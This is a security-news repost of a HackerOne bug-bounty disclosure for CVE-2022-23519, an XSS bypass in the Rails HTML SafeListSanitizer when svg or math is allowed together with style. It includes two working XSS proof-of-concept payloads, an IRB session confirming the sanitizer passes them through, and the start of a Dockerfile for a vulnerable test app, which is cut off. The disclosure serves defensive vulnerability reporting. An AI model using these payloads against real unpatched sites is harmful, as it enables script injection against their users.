🕵️ Internet Bug Bounty: CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
Nachrichtenbereich: 🕵️ Sicherheitslücken
🔗 Quelle: vulners.com
The following is from: https://hackerone.com/reports/1656627 Intro The Rails HTML sanitzier allows to set certain combinations of tags in it's allow list that are not properly handled. Similar to the report 1530898, which identified the combinationselect and style as vulnerable, my fuzz testing from today suggests that also svg and style as well as math and style allow XSS. The following are PoCs for each of these allow list: - svg and style: <svg><style><script>alert(1)</script></style></svg> - math and style: <math><style><img src=x onerror=alert(1)></style></math> See the following IRB session: irb(main):016:0> require 'rails-html-sanitizer' => false irb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize("<svg><style><script>alert(1)</script></style></svg>", tags: ["svg", "style"]).to_s => "<svg><style><script>alert(1)</script></style></svg>" irb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize("<math><style><img src=x onerror=alert(1)></style></math>", tags: ["math", "style"]).to_s => "<math><style><img src=x onerror=alert(1)></style></math>" irb(main):019:0> puts Rails::Html::Sanitizer::VERSION 1.4.3 => nil Sample Vulnerable Rails Application To build a sample rails application that is vulnerable, I've used the following Dockerfile: ``` FROM ruby:3.1.2 RUN apt-get update && apt-get install -y vim WORKDIR /usr/src/app RUN gem install rails && rails new myapp WORKDIR /usr/src/app/myapp COPY build-rails-app.sh ./build-rails-app.sh RUN sh... ...